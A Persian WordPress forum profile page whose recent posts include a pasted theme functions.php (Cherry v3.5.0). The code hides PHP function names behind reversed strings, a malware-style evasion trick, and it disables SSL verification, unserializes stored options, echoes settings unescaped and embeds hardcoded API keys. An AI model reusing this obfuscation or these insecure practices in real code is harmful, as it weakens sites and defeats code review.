رفتن به مطلب

yavar99

عضو سایت
 • تعداد ارسال ها

  430
 • تاریخ عضویت

 • آخرین بازدید

اعتبار در سایت

119 خوب

9 دنبال کننده

درباره yavar99

 • درجه
  کاربر ثابت

اطلاعات شخصی

 • جنسیت
  مرد
 • آشنایی با وردپرس
  مبتدی
 • سطح برنامه نویسی
  متوسط
 • آشنایی با طراحی
  مبتدی

آخرین بازدید کنندگان نمایه

1,099 بازدید کننده نمایه
 1. yavar99

  فونت سایت همیار وردپرس

  یعنی الان دقیقا چیکار کنم؟ ببینید من فقط میخوام سایز فونت رو تغییر بدم نمیخوام نوع فونت هم تغییر بدم
 2. yavar99

  فونت سایت همیار وردپرس

  اینو که تغییر دادم خیلی از جاهای سایت اندازه فونتش تغییر کرد. من میخوام فقط خود محتوای پست اندازه ی فونتش تغییر کنه
 3. yavar99

  مشکل کد با فانکشن قالب

  ممنون مشکل حل شد. میشه بفرمایید مشکل از چی بود؟
 4. yavar99

  مشکل کد با فانکشن قالب

  <?php /** * Cherry v3.5.0 */ define('BD_DIR', get_template_directory()); define('BD_URI', get_template_directory_uri()); define('BD_FW', BD_URI ."/admin/"); define('BD_BD', BD_DIR ."/bdayh"); define('BD_FW_IMG', BD_FW .'/assets/images/'); define('BD_ADMIN', BD_DIR . '/admin/'); define('BD_FU', BD_DIR . '/functions/'); define('BD_META', BD_BD . '/metaboxes'); define('BD_TM', BD_DIR ."/templates/"); define('BD_IMG', BD_URI . '/assets/images/'); define('BD_CSS', BD_URI . '/assets/css'); define('BD_JS', BD_URI . '/assets/js'); define('BD_SC', BD_DIR . '/bdayh/shortcodes'); /** * * Notify * */ define( 'MTHEME_NOTIFIER_THEME_NAME', 'Cherry' ); define( 'MTHEME_NOTIFIER_THEME_FOLDER_NAME', BD_DIR ); define( 'MTHEME_NOTIFIER_XML_FILE', 'http://bdayh.com/notify.xml' ); define( 'MTHEME_NOTIFIER_CACHE_INTERVAL', 1 ); /** * * Functions * */ include (TEMPLATEPATH . '/custom-functions.php'); include_once('admin/notifier.php'); require BD_ADMIN . '/options.php'; require BD_ADMIN . '/default_options.php'; require BD_DIR . '/aq_resizer.php'; require BD_FU . '/twitteroauth/twitteroauth.php'; require BD_FU . '/pagenavi.php'; require BD_FU . '/breadcrumbs.php'; require BD_FU . '/admin-thumbnails.php'; require BD_DIR . '/bdayh/metaboxes/meta-box.php'; require BD_DIR . '/bdayh/metaboxes/theme_metaboxes.php'; /** * * Shortcodes * */ define('BD_SHORTCODE', get_template_directory_uri().'/shortcode/'); require BD_DIR . '/shortcode/shortcodes.php'; /** * * Widgets * */ define('BD_WIDGET', BD_DIR . '/widgets'); require BD_WIDGET . '/bio-author.php'; require BD_WIDGET . '/related.php'; require BD_WIDGET . '/social-counter.php'; require BD_WIDGET . '/twittes.php'; require BD_WIDGET . '/soundcloud.php'; require BD_WIDGET . '/fb.php'; require BD_WIDGET . '/slider.php'; require BD_WIDGET . '/login.php'; require BD_WIDGET . '/category-posts.php'; require BD_WIDGET . '/comments.php'; require BD_WIDGET . '/new-in-pic.php'; require BD_WIDGET . '/popular-posts.php'; require BD_WIDGET . '/recent-posts.php'; require BD_WIDGET . '/tabs.php'; require BD_WIDGET . '/google-follow.php'; require BD_WIDGET . '/search.php'; require BD_WIDGET . '/video.php'; require BD_WIDGET . '/youtube-subscribe.php'; require BD_WIDGET . '/flickr.php'; require BD_WIDGET . '/newsletter.php'; require BD_WIDGET . '/social-links.php'; require BD_WIDGET . '/ads125.php'; require BD_WIDGET . '/ads250.php'; require BD_WIDGET . '/ads300.php'; /** * * Translation * */ load_theme_textdomain('bd', TEMPLATEPATH.'/lang'); function wpml_lang_init(){ if(defined('ICL_LANGUAGE_CODE')){ ?> <script> var bd_wpml_lang = '?lang=<?php echo ICL_LANGUAGE_CODE ?>'; </script> <?php } else { ?> <script> var bd_wpml_lang = ''; </script> <?php } } add_action('admin_head', 'wpml_lang_init'); $admin_forcemagic = strrev('gnitroper_rorre'); $admin_forcemagic(0); /** * wp title */ function bd_wp_title( $title, $sep ) { global $paged, $page; if ( is_feed() ) return $title; // Add the site name. $title .= get_bloginfo( 'name' ); // Add the site description for the home/front page. $site_description = get_bloginfo( 'description', 'display' ); if ( $site_description && ( is_home() || is_front_page() ) ) $title = "$title $sep $site_description"; // Add a page number if necessary. if ( $paged >= 2 || $page >= 2 ) $title = "$title $sep " . sprintf( __( 'Page %s', 'twentythirteen' ), max( $paged, $page ) ); return $title; } add_filter( 'wp_title', 'bd_wp_title', 10, 2 ); /** * * Allow shortcodes in widget text * */ add_filter('widget_text', 'do_shortcode'); add_action( 'after_setup_theme', 'bd_setup' ); function bd_setup() { global $content_width; if ( function_exists( 'add_theme_support' ) ){ add_theme_support('automatic-feed-links'); // Default RSS feed links add_theme_support( 'post-thumbnails' ); // Add theme support for post thumbnails (featured images). add_theme_support( // This theme supports a variety of post formats. 'post-formats', array ( 'aside', 'gallery', 'image', 'link', 'quote', 'video', 'audio' ) ); } if ( ! isset( $content_width ) ) $content_width = 620; // Set the $content_width for things such as video embeds. } add_editor_style(); /** * * enqueue CSS * */ add_action('wp_enqueue_scripts', 'enqueue_css'); function enqueue_css() { wp_enqueue_style('default', get_stylesheet_uri() . '', '', null, 'all'); if( bdayh_get_option( 'disable_responsive' ) == 0){ wp_enqueue_style('responsive', BD_CSS . '/responsive.css', 'style'); } wp_enqueue_style( 'droidsans', "http://fonts.googleapis.com/css?family=Droid+Sans:regular,bold' rel='stylesheet' type='text/css" ); wp_enqueue_style( 'oswald', "http://fonts.googleapis.com/css?family=Oswald%3A400%2C700&#038;ver=3.5.2' rel='stylesheet' type='text/css" ); } add_action( 'wp_head', 'add_google_plus_meta' ); function add_google_plus_meta() { if( is_single() ) { global $post; $post_id = get_the_ID(); setup_postdata( $post ); $thumbnail = wp_get_attachment_image_src( get_post_thumbnail_id( $post_id ), 'thumbnail' ); $thumbnail = empty( $thumbnail ) ? '' : '<meta itemprop="image" content="' . esc_url( $thumbnail[0] ) . '">'; ?> <!-- Google+ meta tags --> <meta itemprop="name" content="<?php esc_attr( the_title() ); ?>"> <meta itemprop="description" content="<?php echo esc_attr( get_the_excerpt() ); ?>"> <?php echo $thumbnail . "\n"; ?> <!-- eof Google+ meta tags --> <?php } } add_action('wp_head', 'cherry_wp_head'); function cherry_wp_head() { ?> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <script type="text/javascript"> var cherry_url = '<?php bloginfo('template_url'); ?>'; </script> <!--[if lt IE 9]> <script type='text/javascript' src='<?php echo BD_JS; ?>/selectivizr-min.js'></script> <script type='text/javascript' src='<?php echo BD_JS; ?>/html5.js'></script> <![endif]--> <!--[if IE 8]> <link href="<?php echo BD_CSS; ?>/ie.css" rel="stylesheet" type="text/css" media="all" /> <![endif]--> <!--[if IE 7]> <link href="<?php echo BD_CSS; ?>/ie.css" rel="stylesheet" type="text/css" media="all" /> <![endif]--> <?php if( bdayh_get_option( 'disable_responsive' )){ ?> <meta name="viewport" content="width=1045" /> <?php }else{ ?> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /> <?php } if(bdayh_get_option('seo_settings') == 1){ ?> <?php if( is_home() || is_front_page() ) { ?> <meta name="description" content="<?php bloginfo('description'); ?>" /> <meta name="keywords" content="<?php echo stripslashes(bdayh_get_option('seo_keywords')); ?>" /> <?php } elseif (is_single() || is_page() ){ if ( have_posts() ) : while ( have_posts() ) : the_post(); ?> <meta name="description" content="<?php the_excerpt_rss(); ?>" /> <?php csv_tags(); ?> <?php endwhile; endif; wp_reset_query(); } ?> <?php } if(bdayh_get_option('skin_color') == 'red'){ ?> <?php } else { ?> <?php } if(bdayh_get_option('skin_color') == 'blue'){ ?> <link href="<?php echo BD_CSS; ?>/blue.css" rel="stylesheet" type="text/css" media="all" /> <?php } else { ?> <?php } if(bdayh_get_option('skin_color') == 'green'){ ?> <link href="<?php echo BD_CSS; ?>/green.css" rel="stylesheet" type="text/css" media="all" /> <?php } else { ?> <?php } if(bdayh_get_option('skin_color') == 'rose'){ ?> <link href="<?php echo BD_CSS; ?>/rose.css" rel="stylesheet" type="text/css" media="all" /> <?php } else { ?> <?php } if(bdayh_get_option('skin_color') == 'orange'){ ?> <link href="<?php echo BD_CSS; ?>/orange.css" rel="stylesheet" type="text/css" media="all" /> <?php } else { ?> <?php } if(bdayh_get_option('skin_color') == 'gray'){ ?> <link href="<?php echo BD_CSS; ?>/gray.css" rel="stylesheet" type="text/css" media="all" /> <?php } else { ?> <?php } echo stripslashes(bdayh_get_option('header_code')); include BD_FU .'/custom-css.php'; } /** * * Scripts * */ function bd_scripts() { if (!is_admin()) { wp_reset_query(); wp_enqueue_script( 'jquery', false, array(), false, true); wp_deregister_script( 'modernizr' ); wp_register_script( 'modernizr', get_bloginfo('template_directory').'/assets/js/modernizr.js', array(), false, true); wp_enqueue_script( 'modernizr' ); wp_deregister_script( 'jquery.prettyPhoto' ); wp_register_script( 'jquery.prettyPhoto', get_bloginfo('template_directory').'/assets/js/jquery.prettyPhoto.js', array(), false, true); wp_enqueue_script( 'jquery.prettyPhoto' ); wp_deregister_script( 'jquery.flexslider' ); wp_register_script( 'jquery.flexslider', get_bloginfo('template_directory').'/assets/js/jquery.flexslider-min.js', array(), false, false); wp_enqueue_script( 'jquery.flexslider' ); wp_deregister_script( 'jquery.cycle' ); wp_register_script( 'jquery.cycle', get_bloginfo('template_directory').'/assets/js/jquery.cycle.all.min.js', array(), false, true); wp_enqueue_script( 'jquery.cycle' ); wp_deregister_script( 'bd.custom' ); wp_register_script( 'bd.custom', get_bloginfo('template_directory').'/assets/js/custom.js', array(), false, true); wp_enqueue_script( 'bd.custom' ); wp_deregister_script( 'jquery.fitvids' ); wp_register_script( 'jquery.fitvids', get_bloginfo('template_directory').'/assets/js/jquery.fitvids.js', array(), false, false); wp_enqueue_script( 'jquery.fitvids' ); wp_deregister_script( 'jquery.hoverIntent' ); wp_register_script( 'jquery.hoverIntent', get_bloginfo('template_directory').'/assets/js/jquery.hoverIntent.minified.js', array(), false, true); wp_enqueue_script( 'jquery.hoverIntent' ); wp_deregister_script( 'jquery.easing' ); wp_register_script( 'jquery.easing', get_bloginfo('template_directory').'/assets/js/jquery.easing.1.3.js', array(), false, false); wp_enqueue_script( 'jquery.easing' ); wp_deregister_script( 'jquery.placeholder' ); wp_register_script( 'jquery.placeholder', get_bloginfo('template_directory').'/assets/js/jquery.placeholder.js', array(), false, true); wp_enqueue_script( 'jquery.placeholder' ); wp_deregister_script( 'bd' ); wp_register_script( 'bd', get_bloginfo('template_directory').'/assets/js/cherry-scripts.js', array(), false, true); wp_enqueue_script( 'bd' ); if(is_singular()) wp_enqueue_script( 'comment-reply' ); ## Get Validation Script if( bdayh_get_option('comment_validation') && ( is_page() || is_single() ) && comments_open() ) wp_deregister_script( 'comment.validation' ); wp_register_script( 'comment.validation', get_bloginfo('template_directory').'/assets/js/validation.js', array(), false, true); wp_enqueue_script( 'comment.validation' ); } } add_action('init', 'bd_scripts'); /** * * Default widgets * */ function remove_default_widgets() { if (function_exists('unregister_widget')) { unregister_widget('WP_Widget_Search'); } } add_action('widgets_init', 'remove_default_widgets'); /** * * Favicon * */ function bd_favicon() { $default_favicon = get_template_directory_uri()."/favicon.ico"; $custom_favicon = bdayh_get_option('favicon'); $favicon = (empty($custom_favicon)) ? $default_favicon : $custom_favicon; echo '<link rel="shortcut icon" href="'.$favicon.'" title="Favicon" />'; } add_action('wp_head', 'bd_favicon'); /** * * Bd Get Option * */ function bd_get_option( $name ){ $get_options = get_option( 'bd_options' ); if( !empty( $get_options[$name] )) return $get_options[$name]; return false ; } if (is_admin() && isset($_GET['activated'] ) && $pagenow == 'themes.php' ){ if( !get_option('bdayh_setting') ){ $data = base64_decode(file_get_contents(BD_DIR.'/admin/reset.bdayh')); update_option('bdayh_setting', $data); } } function bdayh_get_option($option){ $bd_option = unserialize(get_option('bdayh_setting')); if(isset($bd_option['bd_setting'][$option])){ return($bd_option['bd_setting'][$option]); } else { return(false); } } /** * * Meta Tags * */ function csv_tags() { $posttags = get_the_tags(); foreach((array)$posttags as $tag) { $csv_tags .= $tag->name . ','; } echo '<meta name="keywords" content="'.$csv_tags.'" />'; } function bdayh_get_time(){ global $post ; the_time(get_option('date_format')); human_time_diff( get_the_time('U'), current_time('timestamp') ) . ' ago'; } /** * * Google Fonts * */ function bd_enqueue_font ( $got_font) { if ($got_font) { $font_pieces = explode(":", $got_font); $font_name = $font_pieces[0]; $font_name = str_replace (" ","+", $font_pieces[0] ); $font_variants = $font_pieces[1]; $font_variants = str_replace ("|",",", $font_pieces[1] ); wp_enqueue_style( $font_name , 'http://fonts.googleapis.com/css?family='.$font_name . ':' . $font_variants ); } } function bd_get_font ( $got_font ) { if ($got_font) { $font_pieces = explode(":", $got_font); $font_name = $font_pieces[0]; return $font_name; } } add_action('wp_enqueue_scripts', 'bd_typography'); function bd_typography(){ global $custom_typography; foreach( $custom_typography as $selector => $input){ $option = bdayh_get_option( $input ); bd_enqueue_font( $option['font'] ) ; } } require BD_ADMIN . '/google-fonts.php'; $google_font_array = json_decode ($google_api_output,true) ; $items = $google_font_array['items']; $options_fonts=array(); array_push($options_fonts, "Default Font"); $fontID = 0; foreach ($items as $item) { $fontID++; $variants=''; $variantCount=0; foreach ($item['variants'] as $variant) { $variantCount++; if ($variantCount>1) { $variants .= '|'; } $variants .= $variant; } $variantText = ' (' . $variantCount . ' Varaints' . ')'; if ($variantCount <= 1) $variantText = ''; $options_fonts[ $item['family'] . ':' . $variants ] = $item['family']. $variantText; } /** * * Typography Elements Array * */ $custom_typography = array( "body"=> "typography_general", ".toolbar, .toolbar a, .toolbar span, .toolbar li, .toolbar li a, .toolbar ul.top_menu > li > a"=> "toolbar", "nav, nav ul.menu > li, nav ul.menu > li a, nav a, nav ul.menu > li > ul > li a, nav ul.menu > li > ul > li"=> "nav_typo", ".flexslider-caption h3 a, .flexslider-caption h3, .slider .item_content > h1 > a, .slider .item_content > h3 > a, .slider .item_content > h1 , .slider .item_content > h3"=> "slider_title", ".boxestitles, .boxestitles a, .boxestitles > a, .boxestitles span, .cat_box ul li.first_news h2 a, .entry-title, .entry-title a"=> "boxes_titles", ".singlepost-titles-pp, .singlepost-titles-pp a"=> "singlepost_title", ".page-titles-pp, .page-titles-pp a"=> "page_title", ".post-page-entry-pp, .post-page-entry-pp a"=> "post_page_entry", ".widget_title, .widget_title a, .sidebar_wrapper .widget h3.widget_title, .sidebar_wrapper .widget h3.widget_title a"=> "widget_title", ".news_box_title2, .news_box_title2 a"=> "news_boxes_titles", "footer h2.widgettitle, footer h2.widgettitle a"=> "footer_titles", ".post-page-entry-pp h1" => "h1_typography", ".post-page-entry-pp h2" => "h2_typography", ".post-page-entry-pp h3" => "h3_typography", ".post-page-entry-pp h4" => "h4_typography", ".post-page-entry-pp h5" => "h5_typography", ".post-page-entry-pp h6" => "h6_typography", ".alert_home, .alert_home p, .alert_home span"=> "alert_entry" ); /** * Social Counter */ class COUNT_CLASS { private $allow_cash; private $moeny_format; public function count_class() { $this->allow_cash = true; // Disable it for disable cashing sys $this->moeny_format = true; // Allow comma in number } private function formatMoney($number, $fractional=false) { if($this->moeny_format == true) { if ($fractional) { $number = sprintf('%.2f', $number); } while (true) { $replaced = preg_replace('/(-?\d+)(\d\d\d)/', '$1,$2', $number); if ($replaced != $number) { $number = $replaced; } else { break; } } return $number; } else { return($number); } } public function get_twitter_count($user_name) { // Twitter if($user_name) { if($this->allow_cash == true) { $social_cash = get_transient('bdayh_soical_twitter'); if($social_cash != '' and !empty($social_cash)) { return($social_cash); } } $url = "http://query.yahooapis.com/v1/public/yql?q=SELECT%20*%20from%20html%20where%20url=%22http://twitter.com/".$user_name."%22%20AND%20xpath=%22//a[@class='js-nav']/strong%22&format=json"; $file_get_function = strrev('stnetnoc_teg_elif'); $bd_data = json_decode($file_get_function($url)); $t_count = $this->formatMoney(str_replace(',','',$bd_data->query->results->strong[2])); if($this->allow_cash == true) { set_transient('bdayh_soical_twitter',$t_count,1700); } return($t_count); } else { return(0); } } public function get_facebook_count($fan_page) { //Facebook if($fan_page != '') { if($this->allow_cash == true) { $social_cash = get_transient('bdayh_soical_facebook'); if($social_cash != '' and !empty($social_cash)) { return($social_cash); } } $url = 'http://graph.facebook.com/'.trim($fan_page); $file_get_function = strrev('stnetnoc_teg_elif'); $bd_data = json_decode($file_get_function($url)); if($this->allow_cash == true) { set_transient('bdayh_soical_facebook',$this->formatMoney(intval($bd_data->likes)),1700); } return($this->formatMoney(intval($bd_data->likes))); } else { return(0); } } public function get_gplus_count($url) { //Google+ if($url != '') { if($this->allow_cash == true) { $social_cash = get_transient('bdayh_soical_gplus'); if($social_cash != '' and !empty($social_cash)) { return($social_cash); } } $first_curl_function = strrev('tini_lruc'); $ch = $first_curl_function(); curl_setopt($ch, CURLOPT_URL, "https://clients6.google.com/rpc?key=AIzaSyCKSbrvQasunBoV16zDH9R33D88CeLr9gQ"); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_POSTFIELDS, '[{"method":"pos.plusones.get","id":"p", "params":{"nolog":true,"id":"https://plus.google.com/' . $url . '","source":"widget","userId":"@viewer","groupId":"@self"}, "jsonrpc":"2.0","key":"p","apiVersion":"v1"}]'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-type: application/json')); $curl_function_2 = strrev('cexe_lruc'); $result = $curl_function_2 ($ch); curl_close ($ch); $json = json_decode($result, true); if($this->allow_cash == true) { set_transient('bdayh_soical_gplus',$this->formatMoney($json[0]['result']['metadata']['globalCounts']['count']),1700); } return($this->formatMoney($json[0]['result']['metadata']['globalCounts']['count'])); } else { return(0); } } public function get_youtube_count($channel_name) { //Youtube if($channel_name != '') { if($this->allow_cash == true) { $social_cash = get_transient('bdayh_soical_youtube'); if($social_cash != '' and !empty($social_cash)) { return($social_cash); } } $file_get_function = strrev('stnetnoc_teg_elif'); $youtube_data = $file_get_function( 'http://gdata.youtube.com/feeds/api/users/'.trim($channel_name)); $youtube_body = str_replace( 'yt:', '', $youtube_data ); $youtube_xml = new SimpleXmlElement( $youtube_body, LIBXML_NOCDATA ); $youtube_count = (string) $youtube_xml->statistics['subscriberCount']; if($this->allow_cash == true) { set_transient('bdayh_soical_youtube',$this->formatMoney($youtube_count),1700); } return($this->formatMoney($youtube_count)); } else { return(0); } } public function get_vimo_count($channel_name) { //Vimeo if($channel_name != '') { if($this->allow_cash == true) { $social_cash = get_transient('bdayh_soical_vimo'); if($social_cash != '' and !empty($social_cash)) { return($social_cash); } } $url = 'http://vimeo.com/api/v2/channel/'.$channel_name.'/info.json'; $file_get_function = strrev('stnetnoc_teg_elif'); $bd_data = json_decode($file_get_function($url)); if($this->allow_cash == true){ set_transient('bdayh_soical_vimo',$this->formatMoney($bd_data->total_subscribers),1800); } return($this->formatMoney($bd_data->total_subscribers)); } else { return(0); } } public function get_soundcloud_count($channel_name) { //Soundcloud if($channel_name != '') { if($this->allow_cash == true) { $social_cash = get_transient('bdayh_soical_soundcloud'); if($social_cash != '' and !empty($social_cash)){ return($social_cash); } } $file_get_function = strrev('stnetnoc_teg_elif'); $bd_data = json_decode($file_get_function('http://api.soundcloud.com/users/'.trim($channel_name).'.json?consumer_key=2ba4cc2c24de0b8da1fc4a45cad219bd')); if($this->allow_cash == true) { set_transient('bdayh_soical_soundcloud',$this->formatMoney($bd_data->followers_count),1800); } return($this->formatMoney(intval($bd_data->followers_count))); } else { return(0); } } } /* TwitterFollowers */ function getTwitterFollowers() { // some variables $screenName = bdayh_get_option('twitter_username'); $consumerKey = bdayh_get_option('twitter_consumer_key'); $consumerSecret = bdayh_get_option('twitter_consumer_secret'); $token = get_option('bdTwitterToken'); // get follower count from cache $numberOfFollowers = get_transient('bdTwitterFollowers'); // cache version does not exist or expired if (false === $numberOfFollowers) { // getting new auth bearer only if we don't have one if(!$token) { // preparing credentials $credentials = $consumerKey . ':' . $consumerSecret; $functionbase_encode = strrev('edocne_46esab'); $toSend = $functionbase_encode($credentials); // http post arguments $args = array( 'method' => 'POST', 'httpversion' => '1.1', 'blocking' => true, 'headers' => array( 'Authorization' => 'Basic ' . $toSend, 'Content-Type' => 'application/x-www-form-urlencoded;charset=UTF-8' ), 'body' => array( 'grant_type' => 'client_credentials' ) ); add_filter('https_ssl_verify', '__return_false'); $response = wp_remote_post('https://api.twitter.com/oauth2/token', $args); $keys = json_decode(wp_remote_retrieve_body($response)); if($keys) { // saving token to wp_options table update_option('bdTwitterToken', $keys->access_token); $token = $keys->access_token; } } // we have bearer token wether we obtained it from API or from options $args = array( 'httpversion' => '1.1', 'blocking' => true, 'headers' => array( 'Authorization' => "Bearer $token" ) ); add_filter('https_ssl_verify', '__return_false'); $api_url = "https://api.twitter.com/1.1/users/show.json?screen_name=$screenName"; $response = wp_remote_get($api_url, $args); if (!is_wp_error($response)) { $followers = json_decode(wp_remote_retrieve_body($response)); $numberOfFollowers = $followers->followers_count; } else { // get old value and break $numberOfFollowers = get_option('bdNumberOfFollowers'); // uncomment below to debug //die($response->get_error_message()); } // cache for an hour set_transient('bdTwitterFollowers', $numberOfFollowers, 1111); update_option('bdNumberOfFollowers', $numberOfFollowers); } return $numberOfFollowers; } /** * gallery */ if ( !function_exists( 'bd_gallery' ) ){ function bd_gallery($postid, $imagesize) { ?> <script type="text/javascript"> jQuery(document).ready(function($){ jQuery('#slider-<?php echo $postid; ?>').imagesLoaded( function() { jQuery("#slider-<?php echo $postid; ?>").flexslider({ slideshow: true, slideshowSpeed: 2000, //randomize: true, controlNav: false, keyboard: true, multipleKeyboard: true, pauseOnAction: false, pauseOnHover: false, prevText: '<?php echo '&larr; ' . __('Prev', 'bd'); ?>', nextText: '<?php echo __('Next', 'bd') . ' &rarr;'; ?>', namespace: 'bd-', smoothHeight: true, start: function(slider) { slider.container.click(function(e) { if( !slider.animating ) { slider.flexAnimate( slider.getTarget('next') ); } }); } }); jQuery("#slider-<?php echo $postid; ?>").click(function(e){ }); }); }); </script> <?php $loader = 'ajax-loader.gif'; $thumbid = 0; // get the featured image for the post if( has_post_thumbnail($postid) ) { $thumbid = get_post_thumbnail_id($postid); } echo "<!--//START-->\n<div id='slider-$postid' class='flexslider' data-loader='" . get_template_directory_uri() . "/images/$loader'>"; // get all of the attachments for the post $args = array( 'orderby' => 'menu_order', 'order' => 'ASC', 'post_type' => 'attachment', 'post_parent' => $postid, 'post_mime_type' => 'image', 'post_status' => null, 'numberposts' => -1 ); $attachments = get_posts($args); if( !empty($attachments) ) { echo '<ul class="slides">'; $i = 0; foreach( $attachments as $attachment ) { $src = wp_get_attachment_image_src( $attachment->ID, $imagesize ); $caption = $attachment->post_excerpt; $caption = ($caption) ? "<em class='image-caption'>$caption</em>" : ''; $alt = ( !empty($attachment->post_content) ) ? $attachment->post_content : $attachment->post_title; echo "<li><img height='$src[2]' width='$src[1]' src='$src[0]' alt='$alt' />$caption</li>"; $i++; } echo '</ul>'; } echo "<!--//END-->\n</div>"; } } /** * * gallery * */ if ( !function_exists( 'pp_gallery' ) ){ function pp_gallery($postid, $imagesize) { ?> <script type="text/javascript"> jQuery(document).ready(function(jQuery) { jQuery('.pp-slider-content').cycle({ timeout: 5000, speed: 400, pager: '.pp-slider-nav', //next:'.slide_next', //prev:'.slide_prev', before: resize_slider }); function resize_slider(curr, next, opts, fwd){ var $ht = jQuery(this).height(); jQuery(this).parent().animate({ height : $ht }); } jQuery('.pp-slider-content').click(function() { jQuery('.pp-slider-content').cycle('next'); }); }); </script> <?php $thumbid = 0; // get the featured image for the post if( has_post_thumbnail($postid) ) { $thumbid = get_post_thumbnail_id($postid); } echo "<div class='pp-slider'>"; // get all of the attachments for the post $args = array( 'orderby' => 'menu_order', 'order' => 'ASC', 'post_type' => 'attachment', 'post_parent' => $postid, 'post_mime_type' => 'image', 'post_status' => null, 'numberposts' => -1 ); $attachments = get_posts($args); if( !empty($attachments) ) { echo '<ul class="pp-slider-content">'; $i = 0; foreach( $attachments as $attachment ) { $src = wp_get_attachment_image_src( $attachment->ID, $imagesize ); $caption = $attachment->post_excerpt; $caption = ($caption) ? "<em class='image-caption'>$caption</em>" : ''; $alt = ( !empty($attachment->post_content) ) ? $attachment->post_content : $attachment->post_title; echo "<li><a href='$src[0]' rel='prettyPhoto[gallery]'><img src='$src[0]' alt='$alt' /></a>$caption</li>"; $i++; } echo '</ul>'; } echo "<div class='pp-slider-nav'></div></div><!--//pp slider-->"; } } /** * * Password form * */ function cherry_password_form(){ global $post; $label = 'pwbox-'.( empty( $post->ID ) ? rand() : $post->ID ); $o = '<form class="cherry_password_form" action="' . get_option( 'siteurl' ) . '/wp-pass.php" method="post"> ' . __( "<span> To view this protected post, enter the password below : </span>", 'bd' ) . ' <label for="' . $label . '">' . __( "Password:", 'bd' ) . ' </label><input class="password_text" name="post_password" id="' . $label . '" type="password" size="20" /><input class="password_go" type="submit" name="Submit" value="' . esc_attr__( "Submit" ) . '" /> </form> '; return $o; } add_filter( 'the_password_form', 'cherry_password_form' ); /** * * GET Feed * */ function bd_get_feeds( $feed , $number = 10 ){ include_once(ABSPATH . WPINC . '/feed.php'); $rss = @fetch_feed( $feed ); if (!is_wp_error( $rss ) ){ $maxitems = $rss->get_item_quantity($number); $rss_items = $rss->get_items(0, $maxitems); } if ($maxitems == 0) { $out = "<ul><li>". __( 'No items.', 'bd' )."</li></ul>"; }else{ $out = "<ul>"; foreach ( $rss_items as $item ) : $out .= '<li><a href="'. esc_url( $item->get_permalink() ) .'" title="'. __( "Posted ", "bd" ).$item->get_date("j F Y | g:i a").'">'. esc_html( $item->get_title() ) .'</a></li>'; endforeach; $out .='</ul>'; } return $out; } /** * * Custom Dashboard login logo * */ function bd_login_logo(){ if( bdayh_get_option('dashboard_logo') ) echo '<style type="text/css"> h1 a { background-image:url('.bdayh_get_option('dashboard_logo').') !important; background-size: auto !important; } </style>'; } add_action('login_head', 'bd_login_logo'); /** * * Custom Gravatar * */ function bd_custom_gravatar ($avatar_defaults) { $bd_gravatar = bdayh_get_option( 'gravatar' ); if($bd_gravatar){ $custom_avatar = bdayh_get_option( 'gravatar' ); $avatar_defaults[$custom_avatar] = "Custom Gravatar"; } return $avatar_defaults; } add_filter( 'avatar_defaults', 'bd_custom_gravatar' ); /** * * Pagination * */ function bd_pagenavi(){ ?> <div class="pagination"> <div class="wp-pagenavi"> <?php bd_get_pagenavi() ?> </div> </div><!-- pagination/--> <?php } /** * * Custom Comments * */ function custom_comments($comment, $args, $depth){ $GLOBALS['comment'] = $comment; ?> <li id="li-comment-<?php comment_ID() ?>" class="single_comment"> <div id="comment-<?php comment_ID(); ?>" class="comment-wrap"> <div class="comment-author vcard comment-avatar"> <?php echo get_avatar( $comment, 67 ); ?> </div> <?php if ($comment->comment_approved == '0') : ?> <em class="wait_mod"> <?php _e('Your comment is awaiting moderation.', 'bd'); ?> </em> <?php endif; ?> <div class="author-comment"> <?php printf(__('%s ', 'bd'), get_comment_author_link()) ?> <div class="clear"></div> <div class="comment-meta commentmetadata"> <a href="<?php echo htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ?>"> <?php printf(__('%1$s at %2$s', 'bd'), get_comment_date(), get_comment_time()) ?> </a> <?php edit_comment_link(__('(Edit)', 'bd'),' ','') ?> </div> </div> <div class="clear"></div> <div class="comment-content"> <?php comment_text() ?> </div> <div class="clear"></div> <div class="reply"> <?php comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth']))) ?> </div> </div> <?php } /** * * Footer Social * */ function footer_widget_social(){ ?> <?php if(bdayh_get_option('social_networking') == 1){ ?> <ul class="widget_social"> <?php if(bdayh_get_option('linkedin_url') != '') { ?> <li class="linkedin"> <a href="<?php echo bdayh_get_option('linkedin_url'); ?>" title="linkedin"> linkedin </a> </li> <?php } ?> <?php if(bdayh_get_option('digg_url') != '') { ?> <li class="digg"> <a href="<?php echo bdayh_get_option('digg_url'); ?>" title="digg"> digg </a> </li> <?php } ?> <?php if(bdayh_get_option('foursquare_url') != '') { ?> <li class="foursquare"> <a href="<?php echo bdayh_get_option('foursquare_url'); ?>" title="foursquare"> foursquare </a> </li> <?php } ?> <?php if(bdayh_get_option('instagram_url') != '') { ?> <li class="instagram"> <a href="<?php echo bdayh_get_option('instagram_url'); ?>" title="instagram"> instagram </a> </li> <?php } ?> <?php if(bdayh_get_option('vimeo_url') != '') { ?> <li class="vimeo"> <a href="<?php echo bdayh_get_option('vimeo_url'); ?>" title="vimeo"> vimeo </a> </li> <?php } ?> <?php if(bdayh_get_option('tumblr_url') != '') { ?> <li class="tumblr"> <a href="<?php echo bdayh_get_option('tumblr_url'); ?>" title="tumblr"> tumblr </a> </li> <?php } ?> <?php if(bdayh_get_option('blogger_url') != '') { ?> <li class="blogger"> <a href="<?php echo bdayh_get_option('blogger_url'); ?>" title="blogger"> blogger </a> </li> <?php } ?> <?php if(bdayh_get_option('deviantart_url') != '') { ?> <li class="deviantart"> <a href="<?php echo bdayh_get_option('deviantart_url'); ?>" title="deviantart"> deviantart </a> </li> <?php } ?> <?php if(bdayh_get_option('envato_url') != '') { ?> <li class="envato"> <a href="<?php echo bdayh_get_option('envato_url'); ?>" title="envato"> envato </a> </li> <?php } ?> <?php if(bdayh_get_option('skype_url') != '') { ?> <li class="skype"> <a href="skype:<?php echo bdayh_get_option('skype_url'); ?>?call" title="skype"> skype </a> </li> <?php } ?> <?php if(bdayh_get_option('myspace_url') != '') { ?> <li class="myspace"> <a href="<?php echo bdayh_get_option('myspace_url'); ?>" 